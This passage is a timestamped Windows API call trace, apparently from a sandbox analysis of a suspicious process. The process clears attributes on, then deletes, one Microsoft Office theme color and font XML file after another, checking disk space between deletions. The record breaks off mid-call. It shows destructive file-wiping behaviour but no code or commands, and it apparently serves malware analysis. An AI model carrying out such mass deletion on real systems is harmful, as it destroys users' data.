DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Median.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\median.xml")) returned 1 [0069.364] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.368] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Metro.xml", dwFileAttributes=0x80) returned 1 [0069.368] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Metro.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\metro.xml")) returned 1 [0069.372] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.376] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Module.xml", dwFileAttributes=0x80) returned 1 [0069.376] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Module.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\module.xml")) returned 1 [0069.378] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.382] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Newsprint.xml", dwFileAttributes=0x80) returned 1 [0069.383] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Newsprint.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\newsprint.xml")) returned 1 [0069.385] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.391] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Opulent.xml", dwFileAttributes=0x80) returned 1 [0069.391] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Opulent.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\opulent.xml")) returned 1 [0069.394] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.397] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Oriel.xml", dwFileAttributes=0x80) returned 1 [0069.398] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Oriel.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\oriel.xml")) returned 1 [0069.401] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.404] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Origin.xml", dwFileAttributes=0x80) returned 1 [0069.405] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Origin.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\origin.xml")) returned 1 [0069.407] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.411] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Paper.xml", dwFileAttributes=0x80) returned 1 [0069.412] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Paper.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\paper.xml")) returned 1 [0069.414] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.418] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Perspective.xml", dwFileAttributes=0x80) returned 1 [0069.419] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Perspective.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\perspective.xml")) returned 1 [0069.421] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.425] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Pushpin.xml", dwFileAttributes=0x80) returned 1 [0069.425] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Pushpin.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\pushpin.xml")) returned 1 [0069.428] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.437] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Slipstream.xml", dwFileAttributes=0x80) returned 1 [0069.437] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Slipstream.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\slipstream.xml")) returned 1 [0069.441] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.445] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Solstice.xml", dwFileAttributes=0x80) returned 1 [0069.445] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Solstice.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\solstice.xml")) returned 1 [0069.448] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.454] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Technic.xml", dwFileAttributes=0x80) returned 1 [0069.455] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Technic.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\technic.xml")) returned 1 [0069.457] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.463] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Thatch.xml", dwFileAttributes=0x80) returned 1 [0069.464] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Thatch.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\thatch.xml")) returned 1 [0069.466] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.470] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Trek.xml", dwFileAttributes=0x80) returned 1 [0069.471] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Trek.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\trek.xml")) returned 1 [0069.473] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.477] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Urban.xml", dwFileAttributes=0x80) returned 1 [0069.477] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Urban.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\urban.xml")) returned 1 [0069.480] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.485] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Verve.xml", dwFileAttributes=0x80) returned 1 [0069.485] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Verve.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\verve.xml")) returned 1 [0069.488] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.491] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Waveform.xml", dwFileAttributes=0x80) returned 1 [0069.492] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Waveform.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\waveform.xml")) returned 1 [0069.494] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0069.494] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0069.494] CoTaskMemFree (pv=0x506980) [0069.501] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0069.501] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0069.501] CoTaskMemFree (pv=0x506980) [0069.505] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.509] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Adjacency.xml", dwFileAttributes=0x80) returned 1 [0069.509] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Adjacency.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\adjacency.xml")) returned 1 [0069.512] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.516] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Angles.xml", dwFileAttributes=0x80) returned 1 [0069.516] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Angles.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\angles.xml")) returned 1 [0069.518] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.522] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Apex.xml", dwFileAttributes=0x80) returned 1 [0069.523] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Apex.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\apex.xml")) returned 1 [0069.525] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.530] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Apothecary.xml", dwFileAttributes=0x80) returned 1 [0069.530] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Apothecary.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\apothecary.xml")) returned 1 [0069.532] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.537] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Aspect.xml", dwFileAttributes=0x80) returned 1 [0069.537] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Aspect.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\aspect.xml")) returned 1 [0069.540] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.544] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Austin.xml", dwFileAttributes=0x80) returned 1 [0069.544] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Austin.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\austin.xml")) returned 1 [0069.547] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.551] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Black Tie.xml", dwFileAttributes=0x80) returned 1 [0069.552] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Black Tie.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\black tie.xml")) returned 1 [0069.555] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.559] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Civic.xml", dwFileAttributes=0x80) returned 1 [0069.559] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Civic.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\civic.xml")) returned 1 [0069.562] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.566] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Clarity.xml", dwFileAttributes=0x80) returned 1 [0069.566] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Clarity.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\clarity.xml")) returned 1 [0069.568] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.573] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Composite.xml", dwFileAttributes=0x80) returned 1 [0069.574] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Composite.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\composite.xml")) returned 1 [0069.576] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.580] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Concourse.xml", dwFileAttributes=0x80) returned 1 [0069.580] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Concourse.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\concourse.xml")) returned 1 [0069.586] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.590] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Couture.xml", dwFileAttributes=0x80) returned 1 [0069.590] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Couture.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\couture.xml")) returned 1 [0069.592] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.596] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Elemental.xml", dwFileAttributes=0x80) returned 1 [0069.596] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Elemental.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\elemental.xml")) returned 1 [0069.599] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.603] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Equity.xml", dwFileAttributes=0x80) returned 1 [0069.603] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Equity.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\equity.xml")) returned 1 [0069.606] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.610] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Essential.xml", dwFileAttributes=0x80) returned 1 [0069.610] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Essential.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\essential.xml")) returned 1 [0069.613] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.617] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Executive.xml", dwFileAttributes=0x80) returned 1 [0069.617] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Executive.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\executive.xml")) returned 1 [0069.619] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.623] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Flow.xml", dwFileAttributes=0x80) returned 1 [0069.623] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Flow.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\flow.xml")) returned 1 [0069.627] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.631] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Foundry.xml", dwFileAttributes=0x80) returned 1 [0069.632] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Foundry.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\foundry.xml")) returned 1 [0069.635] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.639] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Grid.xml", dwFileAttributes=0x80) returned 1 [0069.639] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Grid.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\grid.xml")) returned 1 [0069.642] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.646] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Hardcover.xml", dwFileAttributes=0x80) returned 1 [0069.646] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Hardcover.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\hardcover.xml")) returned 1 [0069.648] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.653] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Horizon.xml", dwFileAttributes=0x80) returned 1 [0069.653] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Horizon.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\horizon.xml")) returned 1 [0069.655] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, 